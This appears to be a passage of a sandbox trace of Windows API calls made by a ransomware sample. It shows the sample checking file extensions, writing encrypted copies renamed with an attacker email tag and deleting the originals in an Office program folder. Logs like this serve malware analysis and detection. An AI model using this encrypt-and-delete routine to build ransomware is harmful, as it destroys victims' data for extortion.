	[0153.780] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\WINWORD.DEV_F_COL.HXK") returned 69
	[0153.780] lstrlenW (lpString=".zip") returned 4
	[0153.780] lstrcmpiW (lpString1=".zip", lpString2=".HXK") returned 1
	[0153.780] lstrlenW (lpString=".rar") returned 4
	[0153.780] lstrcmpiW (lpString1=".rar", lpString2=".HXK") returned 1
	[0153.780] lstrlenW (lpString=".bz2") returned 4
	[0153.780] lstrcmpiW (lpString1=".bz2", lpString2=".HXK") returned -1
	[0153.780] lstrlenW (lpString=".7z") returned 3
	[0153.780] lstrcmpiW (lpString1=".7z", lpString2="HXK") returned -1
	[0153.780] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\WINWORD.DEV_F_COL.HXK") returned 69
	[0153.780] lstrlenW (lpString=".dbf") returned 4
	[0153.780] lstrcmpiW (lpString1=".dbf", lpString2=".HXK") returned -1
	[0153.781] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\WINWORD.DEV_F_COL.HXK") returned 69
	[0153.781] lstrlenW (lpString=".1cd") returned 4
	[0153.781] lstrcmpiW (lpString1=".1cd", lpString2=".HXK") returned -1
	[0153.781] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\WINWORD.DEV_F_COL.HXK") returned 69
	[0153.781] lstrlenW (lpString=".jpg") returned 4
	[0153.781] lstrcmpiW (lpString1=".jpg", lpString2=".HXK") returned 1
	[0153.781] lstrcmpiW (lpString1=".HXK", lpString2=".bot") returned 1
	[0153.781] lstrlenW (lpString="WINWORD.DEV_K_COL.HXK") returned 21
	[0153.781] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\WINWORD.DEV_K_COL.HXK" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\winword.dev_k_col.hxk"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3dc
	[0153.781] GetFileSizeEx (in: hFile=0x3dc, lpFileSize=0xad0ff1c | out: lpFileSize=0xad0ff1c*=113) returned 1
	[0153.781] CloseHandle (hObject=0x3dc) returned 1
	[0153.782] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\WINWORD.DEV_K_COL.HXK" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\winword.dev_k_col.hxk")) returned 0x20
	[0153.782] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\WINWORD.DEV_K_COL.HXK.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\winword.dev_k_col.hxk.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0153.782] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\WINWORD.DEV_K_COL.HXK" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\winword.dev_k_col.hxk"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3dc
	[0153.782] SetFilePointerEx (in: hFile=0x3dc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xad0fec8 | out: lpNewFilePointer=0x0) returned 1
	[0153.782] SetFilePointerEx (in: hFile=0x3dc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xad0fec8 | out: lpNewFilePointer=0x0) returned 1
	[0153.782] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\WINWORD.DEV_K_COL.HXK.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\winword.dev_k_col.hxk.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2a0
	[0153.783] GetLastError () returned 0x0
	[0153.783] ReadFile (in: hFile=0x3dc, lpBuffer=0xb8a0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xad0fed4, lpOverlapped=0x0 | out: lpBuffer=0xb8a0020*, lpNumberOfBytesRead=0xad0fed4*=0x71, lpOverlapped=0x0) returned 1
	[0153.784] WriteFile (in: hFile=0x2a0, lpBuffer=0xb8a0020*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0xad0fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb8a0020*, lpNumberOfBytesWritten=0xad0fc9c*=0x80, lpOverlapped=0x0) returned 1
	[0153.784] ReadFile (in: hFile=0x3dc, lpBuffer=0xb8a0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xad0fed4, lpOverlapped=0x0 | out: lpBuffer=0xb8a0020*, lpNumberOfBytesRead=0xad0fed4*=0x0, lpOverlapped=0x0) returned 1
	[0153.784] WriteFile (in: hFile=0x2a0, lpBuffer=0xb8a0020*, nNumberOfBytesToWrite=0xfe, lpNumberOfBytesWritten=0xad0fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb8a0020*, lpNumberOfBytesWritten=0xad0fc9c*=0xfe, lpOverlapped=0x0) returned 1
	[0153.785] SetEndOfFile (hFile=0x2a0) returned 1
	[0153.785] CloseHandle (hObject=0x2a0) returned 1
	[0153.785] SetFilePointerEx (in: hFile=0x3dc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xad0fec8 | out: lpNewFilePointer=0x0) returned 1
	[0153.785] SetEndOfFile (hFile=0x3dc) returned 1
	[0153.791] CloseHandle (hObject=0x3dc) returned 1
	[0153.792] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\WINWORD.DEV_K_COL.HXK.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0154.145] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\WINWORD.DEV_K_COL.HXK" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\winword.dev_k_col.hxk")) returned 1
	[0154.147] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\WINWORD.DEV_K_COL.HXK") returned 69
	[0154.147] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\WINWORD.DEV_K_COL.HXK") returned 69
	[0154.147] lstrlenW (lpString=".doc") returned 4
	[0154.147] lstrcmpiW (lpString1=".doc", lpString2=".HXK") returned -1
	[0154.147] lstrlenW (lpString=".docx") returned 5
	[0154.147] lstrcmpiW (lpString1=".docx", lpString2="L.HXK") returned -1
	[0154.147] lstrlenW (lpString=".pdf") returned 4
	[0154.147] lstrcmpiW (lpString1=".pdf", lpString2=".HXK") returned 1
	[0154.147] lstrlenW (lpString=".xls") returned 4
	[0154.147] lstrcmpiW (lpString1=".xls", lpString2=".HXK") returned 1
	[0154.147] lstrlenW (lpString=".xlsx") returned 5
	[0154.147] lstrcmpiW (lpString1=".xlsx", lpString2="L.HXK") returned -1
	[0154.147] lstrlenW (lpString=".ppt") returned 4
	[0154.147] lstrcmpiW (lpString1=".ppt", lpString2=".HXK") returned 1
	[0154.147] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\WINWORD.DEV_K_COL.HXK") returned 69
	[0154.147] lstrlenW (lpString=".zip") returned 4
	[0154.147] lstrcmpiW (lpString1=".zip", lpString2=".HXK") returned 1
	[0154.147] lstrlenW (lpString=".rar") returned 4
	[0154.147] lstrcmpiW (lpString1=".rar", lpString2=".HXK") returned 1
	[0154.147] lstrlenW (lpString=".bz2") returned 4
	[0154.148] lstrcmpiW (lpString1=".bz2", lpString2=".HXK") returned -1
	[0154.148] lstrlenW (lpString=".7z") returned 3
	[0154.148] lstrcmpiW (lpString1=".7z", lpString2="HXK") returned -1
	[0154.148] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\WINWORD.DEV_K_COL.HXK") returned 69
	[0154.148] lstrlenW (lpString=".dbf") returned 4
	[0154.148] lstrcmpiW (lpString1=".dbf", lpString2=".HXK") returned -1
	[0154.148] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\WINWORD.DEV_K_COL.HXK") returned 69
	[0154.148] lstrlenW (lpString=".1cd") returned 4
	[0154.148] lstrcmpiW (lpString1=".1cd", lpString2=".HXK") returned -1
	[0154.148] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\WINWORD.DEV_K_COL.HXK") returned 69
	[0154.148] lstrlenW (lpString=".jpg") returned 4
	[0154.148] lstrcmpiW (lpString1=".jpg", lpString2=".HXK") returned 1
	[0154.148] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\WINWORD.DEV_K_COL.HXK") returned 69
	[0154.148] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\WINWORD.DEV_K_COL.HXK") returned 69
	[0154.148] lstrlenW (lpString=".doc") returned 4
	[0154.148] lstrcmpiW (lpString1=".doc", lpString2=".HXK") returned -1
	[0154.148] lstrlenW (lpString=".docx") returned 5
	[0154.148] lstrcmpiW (lpString1=".docx", lpString2="L.HXK") returned -1
	[0154.148] lstrlenW (lpString=".pdf") returned 4
	[0154.148] lstrcmpiW (lpString1=".pdf", lpString2=".HXK") returned 1
	[0154.148] lstrlenW (lpString=".xls") returned 4
	[0154.148] lstrcmpiW (lpString1=".xls", lpString2=".HXK") returned 1
	[0154.148] lstrlenW (lpString=".xlsx") returned 5
	[0154.148] lstrcmpiW (lpString1=".xlsx", lpString2="L.HXK") returned -1
	[0154.148] lstrlenW (lpString=".ppt") returned 4
	[0154.148] lstrcmpiW (lpString1=".ppt", lpString2=".HXK") returned 1
	[0154.148] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\WINWORD.DEV_K_COL.HXK") returned 69
	[0154.148] lstrlenW (lpString=".zip") returned 4
	[0154.148] lstrcmpiW (lpString1=".zip", lpString2=".HXK") returned 1
	[0154.148] lstrlenW (lpString=".rar") returned 4
	[0154.149] lstrcmpiW (lpString1=".rar", lpString2=".HXK") returned 1
	[0154.149] lstrlenW (lpString=".bz2") returned 4
	[0154.149] lstrcmpiW (lpString1=".bz2", lpString2=".HXK") returned -1
	[0154.149] lstrlenW (lpString=".7z") returned 3
	[0154.149] lstrcmpiW (lpString1=".7z", lpString2="HXK") returned -1
	[0154.149] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\WINWORD.DEV_K_COL.HXK") returned 69
	[0154.149] lstrlenW (lpString=".dbf") returned 4
	[0154.149] lstrcmpiW (lpString1=".dbf", lpString2=".HXK") returned -1
	[0154.149] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\WINWORD.DEV_K_COL.HXK") returned 69
	[0154.149] lstrlenW (lpString=".1cd") returned 4
	[0154.149] lstrcmpiW (lpString1=".1cd", lpString2=".HXK") returned -1
	[0154.149] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\WINWORD.DEV_K_COL.HXK") returned 69
	[0154.149] lstrlenW (lpString=".jpg") returned 4
	[0154.149] lstrcmpiW (lpString1=".jpg", lpString2=".HXK") returned 1
	[0154.149] lstrcmpiW (lpString1=".VSL", lpString2=".bot") returned 1
	[0154.149] lstrlenW (lpString="WORKFLOW.VSL") returned 12
	[0154.149] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\WORKFLOW.VSL" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\workflow.vsl"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3dc
	[0154.150] GetFileSizeEx (in: hFile=0x3dc, lpFileSize=0xad0ff1c | out: lpFileSize=0xad0ff1c*=42336) returned 1
	[0154.150] CloseHandle (hObject=0x3dc) returned 1
	[0154.150] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\WORKFLOW.VSL" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\workflow.vsl")) returned 0x20
	[0154.150] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\WORKFLOW.VSL.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\workflow.vsl.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0154.150] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\WORKFLOW.VSL" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\workflow.vsl"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3dc
	[0154.150] SetFilePointerEx (in: hFile=0x3dc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xad0fec8 | out: lpNewFilePointer=0x0) returned 1
	[0154.150] SetFilePointerEx (in: hFile=0x3dc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xad0fec8 | out: lpNewFilePointer=0x0) returned 1
	[0154.150] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\WORKFLOW.VSL.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\workflow.vsl.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3ac
	[0154.151] GetLastError () returned 0x0
	[0154.151] ReadFile (in: hFile=0x3dc, lpBuffer=0xb8a0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xad0fed4, lpOverlapped=0x0 | out: lpBuffer=0xb8a0020*, lpNumberOfBytesRead=0xad0fed4*=0xa560, lpOverlapped=0x0) returned 1
	[0154.154] WriteFile (in: hFile=0x3ac, lpBuffer=0xb8a0020*, nNumberOfBytesToWrite=0xa570, lpNumberOfBytesWritten=0xad0fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb8a0020*, lpNumberOfBytesWritten=0xad0fc9c*=0xa570, lpOverlapped=0x0) returned 1
	[0154.155] ReadFile (in: hFile=0x3dc, lpBuffer=0xb8a0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xad0fed4, lpOverlapped=0x0 | out: lpBuffer=0xb8a0020*, lpNumberOfBytesRead=0xad0fed4*=0x0, lpOverlapped=0x0) returned 1
	[0154.155] WriteFile (in: hFile=0x3ac, lpBuffer=0xb8a0020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0xad0fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb8a0020*, lpNumberOfBytesWritten=0xad0fc9c*=0xec, lpOverlapped=0x0) returned 1
	[0154.155] SetEndOfFile (hFile=0x3ac) returned 1
	[0154.155] CloseHandle (hObject=0x3ac) returned 1
	[0154.155] SetFilePointerEx (in: hFile=0x3dc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xad0fec8 | out: lpNewFilePointer=0x0) returned 1
	[0154.155] SetEndOfFile (hFile=0x3dc) returned 1
	[0154.158] CloseHandle (hObject=0x3dc) returned 1
	[0154.158] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\WORKFLOW.VSL.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0154.158] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\WORKFLOW.VSL" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\workflow.vsl")) returned 1
	[0154.159] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\WORKFLOW.VSL") returned 60
	[0154.159] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\WORKFLOW.VSL") returned 60
	[0154.159] lstrlenW (lpString=".doc") returned 4
	[0154.159] lstrcmpiW (lpString1=".doc", lpString2=".VSL") returned -1
	[0154.159] lstrlenW (lpString=".docx") returned 5
	[0154.159] lstrcmpiW (lpString1=".docx", lpString2="W.VSL") returned -1
	[0154.159] lstrlenW (lpString=".pdf") returned 4
	[0154.159] lstrcmpiW (lpString1=".pdf", lpString2=".VSL") returned -1
	[0154.159] lstrlenW (lpString=".xls") returned 4
	[0154.159] lstrcmpiW (lpString1=".xls", lpString2=".VSL") returned 1
	[0154.159] lstrlenW (lpString=".xlsx") returned 5
	[0154.159] lstrcmpiW (lpString1=".xlsx", lpString2="W.VSL") returned -1
	[0154.159] lstrlenW (lpString=".ppt") returned 4
	[0154.159] lstrcmpiW (lpString1=".ppt", lpString2=".VSL") returned -1
	[0154.159] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\WORKFLOW.VSL") returned 60
	[0154.159] lstrlenW (lpString=".zip") returned 4
	[0154.159] lstrcmpiW (lpString1=".zip", lpString2=".VSL") returned 1
	[0154.159] lstrlenW (lpString=".rar") returned 4
	[0154.159] lstrcmpiW (lpString1=".rar", lpString2=".VSL") returned -1
	[0154.159] lstrlenW (lpString=".bz2") returned 4
	[0154.159] lstrcmpiW (lpString1=".bz2", lpString2=".VSL") returned -1
	[0154.160] lstrlenW (lpString=".7z") returned 3
	[0154.160] lstrcmpiW (lpString1=".7z", lpString2="VSL") returned -1
	[0154.160] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\WORKFLOW.VSL") returned 60
	[0154.160] lstrlenW (lpString=".dbf") returned 4
	[0154.160] lstrcmpiW (lpString1=".dbf", lpString2=".VSL") returned -1
	[0154.160] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\WORKFLOW.VSL") returned 60
	[0154.160] lstrlenW (lpString=".1cd") returned 4
	[0154.160] lstrcmpiW (lpString1=".1cd", lpString2=".VSL") returned -1
	[0154.160] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\WORKFLOW.VSL") returned 60
	[0154.160] lstrlenW (lpString=".jpg") returned 4
	[0154.160] lstrcmpiW (lpString1=".jpg", lpString2=".VSL") returned -1
	[0154.160] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\WORKFLOW.VSL") returned 60
	[0154.160] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\WORKFLOW.VSL") returned 60
	[0154.160] lstrlenW (lpString=".doc") returned 4
	[0154.160] lstrcmpiW (lpString1=".doc", lpString2=".VSL") returned -1
	[0154.160] lstrlenW (lpString=".docx") returned 5
	[0154.160] lstrcmpiW (lpString1=".docx", lpString2="W.VSL") returned -1
	[0154.160] lstrlenW (lpString=".pdf") returned 4
	[0154.160] lstrcmpiW (lpString1=".pdf", lpString2=".VSL") returned -1
	[0154.160] lstrlenW (lpString=".xls") returned 4
	[0154.160] lstrcmpiW (lpString1=".xls", lpString2=".VSL") returned 1
	[0154.160] lstrlenW (lpString=".xlsx") returned 5
	[0154.160] lstrcmpiW (lpString1=".xlsx", lpString2="W.VSL") returned -1
	[0154.160] lstrlenW (lpString=".ppt") returned 4
	[0154.160] lstrcmpiW (lpString1=".ppt", lpString2=".VSL") returned -1
	[0154.160] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\WORKFLOW.VSL") returned 60
	[0154.160] lstrlenW (lpString=".zip") returned 4
	[0154.160] lstrcmpiW (lpString1=".zip", lpString2=".VSL") returned 1
	[0154.160] lstrlenW (lpString=".rar") returned 4
	[0154.160] lstrcmpiW (lpString1=".rar", lpString2=".VSL") returned -1
	[0154.161] lstrlenW (lpString=".bz2") returned 4
	[0154.161] lstrcmpiW (lpString1=".bz2", lpString2=".VSL") returned -1
	[0154.161] lstrlenW (lpString=".7z") returned 3
	[0154.161] lstrcmpiW (lpString1=".7z", lpString2="VSL") returned -1
	[0154.161] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\WORKFLOW.VSL") returned 60
	[0154.161] lstrlenW (lpString=".dbf") returned 4
	[0154.161] lstrcmpiW (lpString1=".dbf", lpString2=".VSL") returned -1
	[0154.161] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\WORKFLOW.VSL") returned 60
	[0154.161] lstrlenW (lpString=".1cd") returned 4
	[0154.161] lstrcmpiW (lpString1=".1cd", lpString2=".VSL") returned -1
	[0154.161] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\WORKFLOW.VSL") returned 60
	[0154.161] lstrlenW (lpString=".jpg") returned 4
	[0154.161] lstrcmpiW (lpString1=".jpg", lpString2=".VSL") returned -1
	[0154.161] lstrcmpiW (lpString1=".DLL", lpString2=".bot") returned 1
	[0154.161] lstrlenW (lpString="WWINTL.DLL") returned 10
	[0154.161] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\WWINTL.DLL" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\wwintl.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3dc
	[0154.162] GetFileSizeEx (in: hFile=0x3dc, lpFileSize=0xad0ff1c | out: lpFileSize=0xad0ff1c*=901464) returned 1
	[0154.162] CloseHandle (hObject=0x3dc) returned 1
	[0154.162] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\WWINTL.DLL" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\wwintl.dll")) returned 0x20
	[0154.162] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\WWINTL.DLL.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\wwintl.dll.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0154.162] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\WWINTL.DLL" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\wwintl.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff
	[0154.162] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\WWINTL.DLL") returned 58
	[0154.162] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\WWINTL.DLL") returned 58
	[0154.162] lstrlenW (lpString=".doc") returned 4
	[0154.162] lstrcmpiW (lpString1=".doc", lpString2=".DLL") returned 1
	[0154.162] lstrlenW (lpString=".docx") returned 5
	[0154.162] lstrcmpiW (lpString1=".docx", lpString2="L.DLL") returned -1
	[0154.162] lstrlenW (lpString=".pdf") returned 4
	[0154.162] lstrcmpiW (lpString1=".pdf", lpString2=".DLL") returned 1
	[0154.162] lstrlenW (lpString=".xls") returned 4
	[0154.162] lstrcmpiW (lpString1=".xls", lpString2=".DLL") returned 1
	[0154.162] lstrlenW (lpString=".xlsx") returned 5
	[0154.163] lstrcmpiW (lpString1=".xlsx", lpString2="L.DLL") returned -1
	[0154.163] lstrlenW (lpString=".ppt") returned 4
	[0154.163] lstrcmpiW (lpString1=".ppt", lpString2=".DLL") returned 1
	[0154.163] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\WWINTL.DLL") returned 58
	[0154.163] lstrlenW (lpString=".zip") returned 4
	[0154.163] lstrcmpiW (lpString1=".zip", lpString2=".DLL") returned 1
	[0154.163] lstrlenW (lpString=".rar") returned 4
	[0154.163] lstrcmpiW (lpString1=".rar", lpString2=".DLL") returned 1
	[0154.163] lstrlenW (lpString=".bz2") returned 4
	[0154.163] lstrcmpiW (lpString1=".bz2", lpString2=".DLL") returned -1
	[0154.163] lstrlenW (lpString=".7z") returned 3
	[0154.163] lstrcmpiW (lpString1=".7z", lpString2="DLL") returned -1
	[0154.163] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\WWINTL.DLL") returned 58
	[0154.163] lstrlenW (lpString=".dbf") returned 4
	[0154.163] lstrcmpiW (lpString1=".dbf", lpString2=".DLL") returned -1
	[0154.163] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\WWINTL.DLL") returned 58
	[0154.163] lstrlenW (lpString=".1cd") returned 4
	[0154.163] lstrcmpiW (lpString1=".1cd", lpString2=".DLL") returned -1
	[0154.163] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\WWINTL.DLL") returned 58
	[0154.163] lstrlenW (lpString=".jpg") returned 4
	[0154.163] lstrcmpiW (lpString1=".jpg", lpString2=".DLL") returned 1
	[0154.163] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\WWINTL.DLL") returned 58
	[0154.163] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\WWINTL.DLL") returned 58
	[0154.163] lstrlenW (lpString=".doc") returned 4
	[0154.163] lstrcmpiW (lpString1=".doc", lpString2=".DLL") returned 1
	[0154.163] lstrlenW (lpString=".docx") returned 5
	[0154.163] lstrcmpiW (lpString1=".docx", lpString2="L.DLL") returned -1
	[0154.163] lstrlenW (lpString=".pdf") returned 4
	[0154.163] lstrcmpiW (lpString1=".pdf", lpString2=".DLL") returned 1
	[0154.164] lstrlenW (lpString=".xls") returned 4
	[0154.164] lstrcmpiW (lpString1=".xls", lpString2=".DLL") returned 1
	[0154.164] lstrlenW (lpString=".xlsx") returned 5
	[0154.164] lstrcmpiW (lpString1=".xlsx", lpString2="L.DLL") returned -1
	[0154.164] lstrlenW (lpString=".ppt") returned 4
	[0154.164] lstrcmpiW (lpString1=".ppt", lpString2=".DLL") returned 1
	[0154.164] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\WWINTL.DLL") returned 58
	[0154.164] lstrlenW (lpString=".zip") returned 4
	[0154.164] lstrcmpiW (lpString1=".zip", lpString2=".DLL") returned 1
	[0154.164] lstrlenW (lpString=".rar") returned 4
	[0154.164] lstrcmpiW (lpString1=".rar", lpString2=".DLL") returned 1
	[0154.164] lstrlenW (lpString=".bz2") returned 4
	[0154.164] lstrcmpiW (lpString1=".bz2", lpString2=".DLL") returned -1
	[0154.164] lstrlenW (lpString=".7z") returned 3
	[0154.164] lstrcmpiW (lpString1=".7z", lpString2="DLL") returned -1
	[0154.164] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\WWINTL.DLL") returned 58
	[0154.164] lstrlenW (lpString=".dbf") returned 4
	[0154.164] lstrcmpiW (lpString1=".dbf", lpString2=".DLL") returned -1
	[0154.164] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\WWINTL.DLL") returned 58
	[0154.164] lstrlenW (lpString=".1cd") returned 4
	[0154.164] lstrcmpiW (lpString1=".1cd", lpString2=".DLL") returned -1
	[0154.164] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\WWINTL.DLL") returned 58
	[0154.164] lstrlenW (lpString=".jpg") returned 4
	[0154.164] lstrcmpiW (lpString1=".jpg", lpString2=".DLL") returned 1
	[0154.164] lstrcmpiW (lpString1=".IDX_DLL", lpString2=".bot") returned 1
	[0154.164] lstrlenW (lpString="WWINTL.DLL.IDX_DLL") returned 18
	[0154.164] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\WWINTL.DLL.IDX_DLL" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\wwintl.dll.idx_dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3dc
	[0154.165] GetFileSizeEx (in: hFile=0x3dc, lpFileSize=0xad0ff1c | out: lpFileSize=0xad0ff1c*=108416) returned 1
	[0154.165] CloseHandle (hObject=0x3dc) returned 1
	[0154.165] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\WWINTL.DLL.IDX_DLL" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\wwintl.dll.idx_dll")) returned 0x20
	[0154.165] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\WWINTL.DLL.IDX_DLL.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\wwintl.dll.idx_dll.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0154.165] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\WWINTL.DLL.IDX_DLL" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\wwintl.dll.idx_dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3dc
	[0154.165] SetFilePointerEx (in: hFile=0x3dc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xad0fec8 | out: lpNewFilePointer=0x0) returned 1
